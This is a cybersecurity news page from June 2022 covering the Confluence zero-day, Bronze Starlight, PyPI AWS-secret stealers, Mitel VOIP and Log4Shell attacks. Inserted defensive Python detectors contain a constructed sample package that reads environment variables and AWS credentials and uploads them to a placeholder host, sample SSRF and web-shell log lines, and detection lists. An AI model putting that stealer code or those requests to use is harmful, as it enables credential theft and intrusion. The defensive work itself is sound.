Yesterday (26 June 2022): Security Affairs

Threat actors sell access to tens of vulnerable networks compromised by exploiting Atlassian 0day

26 June 2022 at 18:27

A threat actor is selling access to 50 vulnerable networks that have been compromised exploiting the recently disclosed Atlassian Confluence zero-day.

A threat actor is selling access to 50 vulnerable networks that have been compromised by exploiting the recently discovered Atlassian Confluence zero-day flaw (CVE-2022-26134).

The discovery was made by the Rapid7 Threat Intelligence team and was disclosed by The Record. Access to the vulnerable networks was offered on the Russian-language forum XSS.

According to Rapid7 experts, the seller has a good reputation on the hacking forum. The researchers also urge administrators to patch their installs, and Rapid7 is attempting to identify the 50 companies and notify them.

At the end of May, Atlassian warned of a critical unpatched remote code execution vulnerability affecting all Confluence Server and Data Center supported versions, tracked as CVE-2022-26134, that is being actively exploited in attacks in the wild.

“Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server. Further details about the vulnerability are being withheld until a fix is available.” reads the advisory published by the company.

The vulnerability was reported by security firm Volexity which discovered the issue as part of an investigation into an attack that took over the Memorial Day weekend.

Back to Rapid7’s discovery, the bad news is that the seller that is offering access to the 50 networks also plans to sell access to a list of 10,000 additional vulnerable machines.

Organizations running Confluence servers should also look for indicators of compromise within their networks to determine whether they have been breached.

Ransomware gangs are actively exploiting the CVE-2022-26134 remote code execution (RCE) flaw in Atlassian Confluence Server and Data Center.

Researchers from security firm Prodaft first reported that AvosLocker ransomware operators have already started exploiting the Atlassian Confluence bug, BleepingComputer reported.

The researchers noticed the creation of a “confluence campaign” in the control panel of the AvosLocker operation.

BleepingComputer also reported that operators behind Cerber2021 ransomware (aka CerberImposter) are actively exploiting the Confluence flaw in recent attacks.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Atlassian)

The post Threat actors sell access to tens of vulnerable networks compromised by exploiting Atlassian 0day appeared first on Security Affairs.

Security Affairs newsletter Round 371 by Pierluigi Paganini

26 June 2022 at 14:23

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox.

If you also want to receive, for free, the newsletter covering the international press, subscribe here.

Oracle spent 6 months to fix ‘Mega’ flaws in the Fusion Middleware
Multiple malicious packages in PyPI repository found stealing AWS secrets
Attackers exploited a zero-day in Mitel VOIP devices to compromise a network
Threat actors continue to exploit Log4Shell in VMware Horizon Systems
Vulnerabilities in the Jacuzzi SmartTub app could allow access to users’ data
Google TAG argues that Italian surveillance firm RCS Labs was helped by ISPs to infect mobile users
Chinese Tropic Trooper APT spreads a hacking tool laced with a backdoor
NSO Group told lawmakers that Pegasus spyware was used by at least 5 European countries
QNAP warns of a critical PHP flaw that could lead to remote code execution
Researchers found flaws in MEGA that allowed decryption of user data
Exclusive: Lithuania under cyber-attack after the ban on Russian railway goods
Magecart attacks are still around but are more difficult to detect
Thank you!!! SecurityAffairs awarded as Best European Personal Cybersecurity Blog 2022
Crooks are using RIG Exploit Kit to push Dridex instead of Raccoon stealer
Flagstar Bank discloses a data breach that impacted 1.5 Million individuals
New ToddyCat APT targets high-profile entities in Europe and Asia
New DFSCoerce NTLM relay attack allows taking control over Windows domains
Cybercriminals Use Azure Front Door in Phishing Attacks
Russian APT28 hacker accused of the NATO think tank hack in Germany
Google expert detailed a 5-Year-Old flaw in Apple Safari exploited in the wild
Security Affairs newsletter Round 370 by Pierluigi Paganini
Cisco will not address critical RCE in end-of-life Small Business RV routers
BRATA Android Malware evolves and targets the UK, Spain, and Italy
Critical flaw in Ninja Forms WordPress Plugin actively exploited in the wild
Experts warn of a new eCh0raix ransomware campaign targeting QNAP NAS

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

China-linked APT Bronze Starlight deploys ransomware as a smokescreen

26 June 2022 at 13:40

China-linked APT Bronze Starlight is deploying post-intrusion ransomware families as a diversionary action to its cyber espionage operations.

Researchers from Secureworks reported that a China-linked APT group, tracked as Bronze Starlight (APT10), is deploying post-intrusion ransomware families to cover up the cyber espionage operations.

The experts observed an activity cluster involving post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0.

(Figure: Bronze Starlight ransomware timeline)

However, the victimology, the short lifespan of each ransomware family employed in the attacks, and access to malware used by nation-state actors suggest that the main motivation of the group may be intellectual property theft or cyberespionage. The victims include pharmaceutical companies in Brazil and the U.S., a U.S.-based media organization with offices in China and Hong Kong, electronic component designers and manufacturers in Lithuania and Japan, a law firm in the U.S., and an aerospace and defense division of an Indian conglomerate.

“The ransomware could distract incident responders from identifying the threat actors’ true intent and reduce the likelihood of attributing the malicious activity to a government-sponsored Chinese threat group.” reads the report published by the experts. “The operational cadence and victimology of LockFile, AtomSilo, Rook, Night Sky, and Pandora deployments do not align with conventional financially motivated cybercrime operations. In each case, the ransomware targets a small number of victims over a relatively brief period of time before it ceases operations, apparently permanently.”

Bronze Starlight, active since mid-2021, is also tracked by Microsoft under the emerging threat cluster moniker DEV-0401, with the tech giant emphasizing its involvement in all stages of the ransomware attack cycle right from initial access to the payload deployment.

The group’s hallmark is the use of the HUI Loader, a custom DLL loader that is loaded by legitimate programs vulnerable to DLL search order hijacking. The HUI Loader is used to decrypt and load a third file containing an encrypted payload that is also deployed to the infected host.
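The loading technique described above (a legitimate, signed executable that picks up a malicious DLL from its own directory instead of the real system library) leaves a recognisable trace in image-load telemetry. The detector below is an added example, not Secureworks’ or Microsoft’s tooling: it parses a handful of constructed image-load records, loosely modelled on Sysmon Event ID 7 fields, and raises an alert when a DLL with a well-known system library name is loaded from outside a system directory, or when an unsigned DLL is loaded from the loading process’s own directory. The event lines, the directory list and the set of commonly hijacked DLL names are assumptions made for the demo.

```python
"""Sideloading detection over constructed image-load events (added example)."""
import ntpath
from dataclasses import dataclass

# Lowercase prefixes of directories where system DLLs legitimately live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# DLL names frequently abused for search-order hijacking (assumed list for the demo).
COMMONLY_HIJACKED = {"version.dll", "dbghelp.dll", "wtsapi32.dll",
                     "cryptbase.dll", "userenv.dll", "msvcr100.dll"}


@dataclass
class ImageLoad:
    process: str          # full path of the process that mapped the DLL
    dll: str              # full path of the DLL that was mapped
    signed: bool
    signature_status: str


@dataclass
class Alert:
    process: str
    dll_name: str
    dll_dir: str
    reasons: list


# Constructed records: key=value pairs separated by "|", not real Sysmon output.
SAMPLE_EVENTS = [
    r"Image=C:\Program Files\Vendor\app.exe|ImageLoaded=C:\Windows\System32\version.dll|Signed=true|SignatureStatus=Valid",
    r"Image=C:\Users\alice\AppData\Local\Temp\legit.exe|ImageLoaded=C:\Users\alice\AppData\Local\Temp\version.dll|Signed=false|SignatureStatus=Unavailable",
    r"Image=C:\Program Files\Vendor\app.exe|ImageLoaded=C:\Program Files\Vendor\plugin.dll|Signed=true|SignatureStatus=Valid",
    r"Image=C:\ProgramData\update\svc.exe|ImageLoaded=C:\ProgramData\update\dbghelp.dll|Signed=false|SignatureStatus=Unavailable",
]


def parse_event(line):
    """Turn one key=value|key=value record into an ImageLoad."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ImageLoad(
        process=fields["Image"],
        dll=fields["ImageLoaded"],
        signed=fields.get("Signed", "false").lower() == "true",
        signature_status=fields.get("SignatureStatus", "Unknown"),
    )


def classify(ev):
    """Return the list of reasons this load looks like search-order hijacking."""
    reasons = []
    dll_name = ntpath.basename(ev.dll).lower()
    dll_dir = ntpath.dirname(ev.dll).lower()
    proc_dir = ntpath.dirname(ev.process).lower()
    in_system_dir = ev.dll.lower().startswith(SYSTEM_DIRS)
    if dll_name in COMMONLY_HIJACKED and not in_system_dir:
        reasons.append("system DLL name loaded from outside a system directory")
    if not ev.signed and dll_dir == proc_dir:
        reasons.append("unsigned DLL loaded from the process's own directory")
    return reasons


def detect_sideloading(lines):
    """Parse every record and keep only the loads that trip at least one rule."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = classify(ev)
        if reasons:
            alerts.append(Alert(ev.process, ntpath.basename(ev.dll),
                                ntpath.dirname(ev.dll), reasons))
    return alerts


if __name__ == "__main__":
    for alert in detect_sideloading(SAMPLE_EVENTS):
        print(f"{alert.process} -> {alert.dll_name}: {'; '.join(alert.reasons)}")
```

On the constructed input only the two loads from user-writable directories are flagged; the signed vendor plugin loaded from the application folder and the genuine version.dll from System32 pass. In production the same two rules map onto Sysmon Event ID 7 (Image, ImageLoaded, Signed, SignatureStatus), and the list of DLL names should be tuned to the binaries actually present in the environment.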

Since early 2021, Secureworks CTU researchers observed threat actors deploying HUI Loader in a campaign aimed at intellectual property theft and primarily targeting Japanese organizations. The HUI Loader was employed to load the SodaMaster RAT. The experts pointed out that the victimology and tactics, techniques, and procedures in this campaign align with BRONZE RIVERSIDE activity.

In mid-2021, CTU researchers began tracking a second cluster of activity that uses HUI Loader to load Cobalt Strike Beacon and deploy ransomware. CTU researchers attribute this second cluster of activity to the BRONZE STARLIGHT threat group.

Experts noticed that the HUI Loader samples used to load Cobalt Strike Beacon were involved in the deployment of LockFile, AtomSilo, Rook, Night Sky, and Pandora ransomware.

“The use of HUI Loader to load Cobalt Strike Beacon, the Cobalt Strike Beacon configuration information, the C2 infrastructure, and the code overlap suggest that the same threat group is associated with these five ransomware families. It is likely that BRONZE STARLIGHT is responsible for LockFile, AtomSilo, Rook, Night Sky, and Pandora intrusion activity.” continues the analysis.

CTU pointed out that four HUI Loader samples decrypt and load PlugX RAT payloads, a malware historically used by multiple Chinese threat groups.

“BRONZE STARLIGHT compromises networks by exploiting vulnerabilities in network perimeter devices, including known vulnerabilities for which patches are available. The threat actors deploy HUI Loader to decrypt and execute a Cobalt Strike Beacon for command and control. They then deploy ransomware and exfiltrate sensitive data from the victim’s environment.” concludes the report. “Both the exploitation of known vulnerabilities and the use of the Cobalt Strike for command and control provide opportunities to detect and prevent BRONZE STARLIGHT intrusion activity before exfiltration or ransomware deployment.” 

Pierluigi Paganini

(SecurityAffairs – hacking, Bronze Starlight)

Russia-linked actors may be behind an explosion at a liquefied natural gas plant in Texas

26 June 2022 at 09:32

Russian threat actors may be behind the explosion at a liquefied natural gas plant in Texas; the incident took place on June 8.

A Russian hacking group may be responsible for a cyber attack against a liquefied natural gas plant in Texas that led to its explosion on June 8.

The explosion took place at the Freeport Liquefied Natural Gas (Freeport LNG) liquefaction plant and export terminal on Texas’ Quintana Island. The June 8 incident will have a lasting impact on Freeport LNG’s operations.

(Figure: the liquefied natural gas plant in Texas)

Preliminary investigations suggested that the incident resulted from the overpressure and rupture of a segment of an LNG transfer line, leading to the rapid flashing of LNG and the release and ignition of the natural gas vapor cloud.

At this time it is not clear why the safety mechanisms in place did not prevent the explosion. Experts speculate a cyber attack may have turned off the industrial safety controls at the natural gas facility.

ICS malware like TRITON, which experts associate with the Russia-linked APT group XENOTIME, has offensive capabilities to shut down industrial safety controls and cause extensive damage to industrial facilities.

“On March 24 the U.S. Department of Justice brought charges against four Russian nationals suspected of using TRITON malware in cyber attacks on behalf of the Russian government between 2012 and 2018. That same day, the FBI issued an advisory warning that TRITON malware tools still remain a major threat to industrial systems around the world.” reported the American Military News website.

The Washington Times national security writer Tom Rogan confirmed that the explosion at the Freeport LNG facility could be consistent with a hacking campaign conducted by APT groups like XENOTIME.

Rogan added that the company does have Operational Technology/Industrial Control Systems (OT/ICS) network detection systems in place.

At this time, Freeport LNG denied the theory that sees a cyber attack as the root cause of the incident.

“Unless Freeport LNG has OT/ICS network detection systems deployed appropriately and has completed a forensics investigation, a cyberattack cannot be ruled out,” Rogan wrote.

“Two more sources who spoke with Rogan said that around the time Russia launched its invasion of Ukraine, a cyber unit of Russia’s GRU military intelligence service conducted targeting-reconnaissance operations against Freeport LNG.” continues the American Military News website.

Pierluigi Paganini

(SecurityAffairs – hacking, liquefied natural gas plant)

Before yesterday: Security Affairs

Oracle spent 6 months to fix ‘Mega’ flaws in the Fusion Middleware

25 June 2022 at 20:08

Researchers disclosed technical details of a critical flaw in Fusion Middleware, tracked as CVE-2022-21445, that Oracle took six months to patch.

Security researchers have published technical details of a critical Fusion Middleware vulnerability, tracked as CVE-2022-21445, that was reported to Oracle by researchers PeterJson of VNG Corporation and Nguyen Jang of VNPT in October 2021. The flaw was addressed by the IT giant six months later with the release of its April 2022 Critical Patch Update.

The vulnerability resides in the ADF Faces component; it is a deserialization of untrusted data issue that could lead to arbitrary code execution.

The security duo described the issue as a mega flaw that impacts all applications relying on ADF Faces, including Business Intelligence, Enterprise Manager, Identity Management, SOA Suite, WebCenter Portal, Application Testing Suite, and Transportation Management. The duo named their attack “The Miracle Exploit.”

“Now, after a period of time since Oracle released the patch, we decided to publish this blog to share the details of the Miracle exploit. We were very, very excited at the time (6 months ago), but now we don’t have that feeling anymore because Oracle took too long to patch this vulnerability, more than the standard.” reported the security duo in a blog post. “Anyway, this is a cool exploit, a cool story Jang and I worked on together for a month, so let us tell you our story.”

The researchers also discovered a server-side request forgery (SSRF) vulnerability, tracked as CVE-2022-21497. This issue could be chained with CVE-2022-21445 to achieve pre-authentication remote code execution in Oracle Access Manager.

“In the demonstration we sent to Oracle, we chose edelivery.oracle.com and businessnetwork.oracle.com, which are popular sites for users to download Oracle’s products and are based on the ADF Faces framework.” conclude the experts. “Last but not least, we successfully achieved pre-auth RCE on login.oracle.com, which plays an important role in Oracle’s online services.”

“Why did we hack some of Oracle’s sites? Because we wanted to demonstrate the impact to Oracle and let them know this vulnerability is super dangerous: it affects Oracle’s systems and Oracle’s customers. That’s why we wanted Oracle to take action ASAP. But as you can see, it took Oracle 6 months to patch it. I don’t know why, but we have to accept it and follow Oracle’s policy.” they added.

Pierluigi Paganini

(SecurityAffairs – hacking, Oracle)

Multiple malicious packages in PyPI repository found stealing AWS secrets

25 June 2022 at 17:52

Researchers discovered multiple malicious Python packages in the official PyPI repository stealing AWS credentials and other info.

Sonatype researchers discovered multiple Python packages in the official PyPI repository that have been developed to steal secrets (i.e. AWS credentials and environment variables) and also upload these to a publicly exposed endpoint.

The malicious packages, which were reported to PyPI, are:

“Analyzed by Sonatype security researchers Jorge Cardona and Carlos Fernández, some of these packages either contain code that reads and exfiltrates your secrets or use one of the dependencies that will do the job.” reads the post published by Sonatype.

After PyPI was notified, the packages and the endpoint were taken down.

For example, the analysis of the ‘loglib-modules’ and ‘pygrata-utils’ packages revealed the presence of malicious code to steal AWS credentials and metadata and upload them to one or more endpoints hosted on the PyGrata domain: hxxp://graph.pygrata[.]com:8000/upload

(Figure: PyPI malicious packages)

The stolen data were exposed on the endpoint in the form of hundreds of publicly accessible .TXT files.

“Interestingly though, our researchers noticed the endpoints collecting these credentials were exposing this data to just about anyone on the web. Going up a directory level showed us hundreds of TXT files containing sensitive information and secrets like those shown in the redacted screenshot below.” continues the analysis.

The experts have yet to discover the identity of the threat actor and their motivation. One possible explanation for the exposure of this info is poor OPSEC on the part of the attackers.

Another hypothesis is that the data is the result of some kind of legitimate security testing.
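The behaviour Sonatype describes above (read AWS credentials and environment variables, then upload them to an external endpoint) is easy to express as a static heuristic that a CI pipeline or a pre-install hook can run over a package before it is trusted. The scanner below is an added example, not Sonatype’s tooling and not code from the page: it parses Python source with the standard `ast` module, records credential-access indicators (the `~/.aws/credentials` path, the instance metadata address, `AWS_*` key names, `os.environ`/`os.getenv` reads) separately from outbound-network indicators (HTTP client calls, hard-coded external URLs), and flags a file only when both kinds appear together, so a package that merely reads `AWS_DEFAULT_REGION` is not reported. The three package sources and the `.invalid` upload URL are constructed for the demo.

```python
"""Heuristic scanner for the credential-theft pattern (added example, not Sonatype's)."""
import ast
import os
import re
from dataclasses import dataclass

# Strings that point at AWS credential material or the instance metadata service.
CREDENTIAL_STRINGS = (".aws/credentials", "169.254.169.254", "AWS_ACCESS_KEY_ID",
                      "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")
NETWORK_CALLS = {"urlopen", "post", "put", "request", "urlretrieve"}
ENV_CALLS = {"getenv"}


@dataclass
class Finding:
    category: str   # credential_access | env_read | network_call | egress_url | parse_error
    detail: str
    lineno: int


def _call_name(func):
    """Name of the callee for `pkg.func(...)` or `func(...)`; empty otherwise."""
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


class _Visitor(ast.NodeVisitor):
    def __init__(self):
        self.findings = []

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            for needle in CREDENTIAL_STRINGS:
                if needle in node.value:
                    self.findings.append(Finding("credential_access", needle, node.lineno))
            if re.match(r"https?://", node.value) and "pypi.org" not in node.value:
                self.findings.append(Finding("egress_url", node.value, node.lineno))
        self.generic_visit(node)

    def visit_Attribute(self, node):
        if node.attr == "environ":   # catches os.environ[...] and dict(os.environ)
            self.findings.append(Finding("env_read", "environ", node.lineno))
        self.generic_visit(node)

    def visit_Call(self, node):
        name = _call_name(node.func)
        if name in NETWORK_CALLS:
            self.findings.append(Finding("network_call", name, node.lineno))
        elif name in ENV_CALLS:
            self.findings.append(Finding("env_read", name, node.lineno))
        self.generic_visit(node)


def scan_source(source):
    """Return all findings for one Python source string."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [Finding("parse_error", str(exc), exc.lineno or 0)]
    visitor = _Visitor()
    visitor.visit(tree)
    return visitor.findings


def is_suspicious(findings):
    """Flag only when secret access AND an outbound channel appear in the same file."""
    cats = {f.category for f in findings}
    reads_secrets = bool(cats & {"credential_access", "env_read"})
    sends_out = bool(cats & {"network_call", "egress_url"})
    return reads_secrets and sends_out


def scan_directory(root):
    """Map each .py file under root that trips both heuristics to its findings."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".py"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_source(fh.read())
                if is_suspicious(findings):
                    flagged[path] = findings
    return flagged


# Constructed sample sources (not the real packages). The URL is a placeholder.
BENIGN_SAMPLE = """
import logging
def configure(level="INFO"):
    logging.basicConfig(level=level)
    return logging.getLogger("loglib")
"""
ENV_ONLY_SAMPLE = """
import os
def region():
    return os.getenv("AWS_DEFAULT_REGION", "us-east-1")
"""
MALICIOUS_SAMPLE = """
import os, json
from urllib import request
def _collect():
    data = {"env": dict(os.environ)}
    try:
        with open(os.path.expanduser("~/.aws/credentials")) as fh:
            data["aws"] = fh.read()
    except OSError:
        pass
    return data
def _send(payload):
    req = request.Request("http://exfil-endpoint.invalid:8000/upload",
                          data=json.dumps(payload).encode())
    request.urlopen(req)
_send(_collect())
"""
```

`scan_directory` is the entry point to run over an unpacked sdist or a virtualenv’s `site-packages`; `scan_source` and `is_suspicious` are separated so the heuristics can be tuned (for example, adding an organisation’s own artifact hosts to the URL allow-list) without touching the file walk. Heuristics of this kind find the pattern, not the intent: a hit is a reason to read the package, not proof that it is malicious.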

Pierluigi Paganini

(SecurityAffairs – hacking, PyPI malicious packages)

Attackers exploited a zero-day in Mitel VOIP devices to compromise a network 

25 June 2022 at 11:59

Experts warn threat actors have exploited a zero-day vulnerability in a Mitel VoIP appliance in a ransomware attack.

CrowdStrike researchers recently investigated the compromise of a Mitel VOIP appliance as an entry point in a ransomware attack against the network of an organization. 

The attackers exploited a remote code execution zero-day vulnerability on the Mitel appliance to gain initial access to the target environment. The zero-day was assigned CVE-2022-29499 and received a CVSS score of 9.8.

“A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance.” reads the advisory for this flaw published by the vendor.

The experts determined that the malicious activity had originated from an internal IP address associated with a Linux-based Mitel VOIP appliance sitting on the network perimeter that did not have the CrowdStrike Falcon sensor installed on it.

The forensic investigation revealed that the attackers attempted to remove the files and overwrite free space on the device.

The attack chain involved two HTTP GET requests used to retrieve a specific resource from a remote server and execute the malicious code.

“The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation.” reads the analysis published by Crowdstrike experts. “This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses.”

The responses to the requests demonstrated that the threat actors used the exploit to create a reverse shell.

Once the reverse shell was created, the attacker set up a web shell named pdf_import.php.

The threat actor also downloaded the Chisel tunneling/proxy tool onto the VOIP appliance, then renamed it memdump before executing it. The attackers used the tool as a reverse proxy to allow the threat actor to make lateral movements within the environment via the VOIP device.
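The chain CrowdStrike describes above leaves three distinct marks in the appliance’s web server log: an external request whose parameter carries a URL pointing back at the device itself, a follow-up request that originates from the device’s own address, and later traffic to a web shell file name that does not belong to the product. The script below is an added example, not CrowdStrike’s tooling or code from the report: it parses constructed Apache/nginx-style access-log lines and raises one alert per rule. The log lines, the appliance address `10.0.0.5` and the request paths are assumptions made for the demo; the file name `pdf_import.php` is the one named in the report.

```python
"""Access-log heuristics for the perimeter-appliance intrusion pattern (added example)."""
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
APPLIANCE_ADDRESSES = {"10.0.0.5"}      # assumed: the device's own interface address(es)
WEBSHELL_NAMES = {"pdf_import.php"}     # from the CrowdStrike report quoted on the page

# Constructed log lines in combined-log format; addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Jun/2022:10:15:01 +0000] "GET /portal/index.php?page=home HTTP/1.1" 200 512
203.0.113.10 - - [24/Jun/2022:10:15:07 +0000] "GET /portal/fetch.php?get_url=http://127.0.0.1/restricted/admin.php HTTP/1.1" 200 88
127.0.0.1 - - [24/Jun/2022:10:15:07 +0000] "GET /restricted/admin.php HTTP/1.1" 200 40
198.51.100.7 - - [24/Jun/2022:10:16:30 +0000] "POST /uploads/pdf_import.php HTTP/1.1" 200 12
203.0.113.10 - - [24/Jun/2022:10:17:00 +0000] "GET /portal/fetch.php?get_url=https://updates.example.com/notes.txt HTTP/1.1" 200 2048
"""


@dataclass
class Alert:
    src: str
    target: str
    reason: str


def _local_url(value):
    """True when a parameter value is a URL that points back at the device itself."""
    if not re.match(r"^[a-z][a-z0-9+.-]*://", value, re.I):
        return False
    parts = urlsplit(value)
    if parts.scheme.lower() == "file":
        return True
    host = (parts.hostname or "").lower()
    return host in LOOPBACK or host in APPLIANCE_ADDRESSES


def inspect_line(line):
    """Apply the three rules to one access-log line and return its alerts."""
    m = LOG_RE.match(line)
    if not m:
        return []
    src, target = m.group("src"), m.group("target")
    url = urlsplit(target)
    alerts = []
    # Rule 1: a query parameter carries a URL to the device itself (server-side request).
    for _, value in parse_qsl(url.query, keep_blank_values=True):
        if _local_url(value):
            alerts.append(Alert(src, target, "parameter carries a URL to a local resource"))
            break
    # Rule 2: the request originates from the appliance itself.
    if src in LOOPBACK or src in APPLIANCE_ADDRESSES:
        alerts.append(Alert(src, target, "request originates from the appliance itself"))
    # Rule 3: the requested file is a known web shell name.
    if url.path.rsplit("/", 1)[-1].lower() in WEBSHELL_NAMES:
        alerts.append(Alert(src, target, "request to a known web shell file name"))
    return alerts


def scan_log(text):
    """Run inspect_line over every non-empty line of a log file's contents."""
    return [a for line in text.splitlines() if line.strip() for a in inspect_line(line)]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert.src} {alert.target}: {alert.reason}")
```

The first rule is the important one for the report’s point about the restricted URL: an endpoint that only accepts requests from the device’s own address is protected from the internet, but not from a server-side fetch that the device makes on an attacker’s behalf, and the log shows that fetch as a request whose parameter names the device itself. Rule 2 catches the resulting self-originated request even when the first one was never logged, and rule 3 is a plain file-name match that should be extended with the appliance’s own list of expected scripts.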

“When threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant.” concludes the report. “Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via ‘one hop’ from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements.”

The popular security researcher Kevin Beaumont reported that there are tens of thousands of these devices publicly accessible, most of them in the U.S., followed by the U.K., Canada, and France.

Shodan search to find Mitel boxes:

Presentation online has roughly doubled in 5 years. pic.twitter.com/IYC4r0hjdk

— Kevin Beaumont (@GossiTheDog) June 24, 2022

Pierluigi Paganini

(SecurityAffairs – hacking, Mitel VOIP)

Threat actors continue to exploit Log4Shell in VMware Horizon Systems

24 June 2022 at 15:07

The U.S. CISA and the Coast Guard Cyber Command (CGCYBER) warn of attacks exploiting the Log4Shell flaw in VMware Horizon servers.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), published a joint advisory to warn of hacking attempts exploiting the Log4Shell flaw in VMware Horizon servers to compromise target networks.

“CISA and the United States Coast Guard Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches.” reads the advisory.

The CVE-2021-44228 flaw made the headlines in December, after Chinese security researcher p0rz9 publicly disclosed a proof-of-concept exploit for the critical remote code execution zero-day vulnerability (aka Log4Shell) that affects the Apache Log4j Java-based logging library.

In one attack documented by the government experts, threat actors were able to move laterally inside the network and collect and exfiltrate sensitive data.

This alert includes information about APT actors’ tactics, techniques, and procedures (TTPs), along with indicators of compromise related to the loader malware.

In one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.

Based on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed “hmsvc.exe” that’s equipped with capabilities to log keystrokes and deploy additional malware.

“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network.” reads the joint alert.

In an attack that took place at the end of January, threat actors exploited Log4Shell in an unpatched VMware Horizon server, then used PowerShell scripts to connect to a remote server (109.248.150[.]13) via Hypertext Transfer Protocol (HTTP) to retrieve additional PowerShell scripts. In the same period, CISA observed the actors attempt to download and execute a malicious file from 109.248.150[.]13. The activity started from IP address 104.155.149[.]103, which appears to be part of the actors’ C2 infrastructure.

In a distinct attack, APT actors used PowerShell scripts in the production environment to facilitate lateral movement and implant loader malware that allows remotely monitoring a system’s desktop, gaining reverse shell access, exfiltrating data, and uploading and executing next-stage binaries.

The researchers observed a distinct threat actor exploiting CVE-2022-22954 in VMware Workspace ONE Access and Identity Manager to deliver the Dingo J-spy web shell.

The alert includes incident response guidance and mitigations for the ongoing attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, Log4Shell)
